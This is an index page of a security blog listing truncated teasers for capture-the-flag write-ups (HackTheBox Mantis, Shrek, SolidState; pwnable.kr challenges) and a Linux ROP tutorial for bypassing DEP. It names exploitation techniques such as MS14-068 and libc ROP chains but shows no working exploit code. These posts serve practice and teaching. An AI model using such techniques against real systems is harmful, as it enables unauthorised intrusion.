Booj thoughts on security

HackTheBox - Mantis

This writeup details attaching the Mantis machine from HackTheBox. In short this machine looked indomitable at the start with it’s ridiculous list of open ports. Targeted enumeration, however, reveals that it’s not as bad as first expected. Chapters: Enumeration MS-SQL Credentials MS14-068 Topics: MS-SQL Enumera... Read more

HackTheBox - Shrek

This post will describe exploitation of the Shrek device on HackTheBox. Shrek, also known as steganography hell, or ‘How the hell was anyone supposed to know to do that 7ckm3?’. It’s very much the resident CTF box, so techniques like steganography are more common than service mis-configurations. Also to be expected is a lot of trolling. In... Read more

Stack Buffer Overflows: Linux 3 - Bypassing DEP with ROP

In this chapter we’ll be dealing with systems with ASLR disabled, and with all binary protections disabled bar NX. Here you’ll learn how to craft basic ROP chains using functions in libc, and how to chain multiples of these together. Prior Reading: Chapter 1 Chapter 2. Environment: Ubuntu 16.04 32bit GDB Peda The code we’ll be us... Read more

pwnable.kr - random, coin1 & bof

This post describes three Toddler’s Bottle exploits on pwnable.kr. Random This is a simple binary exploitation challenge. The code for the binary is included once the user has SSH’d in: #include <stdio.h> int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key ^ rando... Read more

HackTheBox - SolidState

This post will describe exploitation of the Solidstate device on HackTheBox. Solidstate’s an interesting box, and also memorable as the day when the HTB platform shit itself from the load. It’s also a lesson in reading the damn exploit code. I spent a long time re-running the exploit expecting stuff to happen, but the true realisation came ... Read more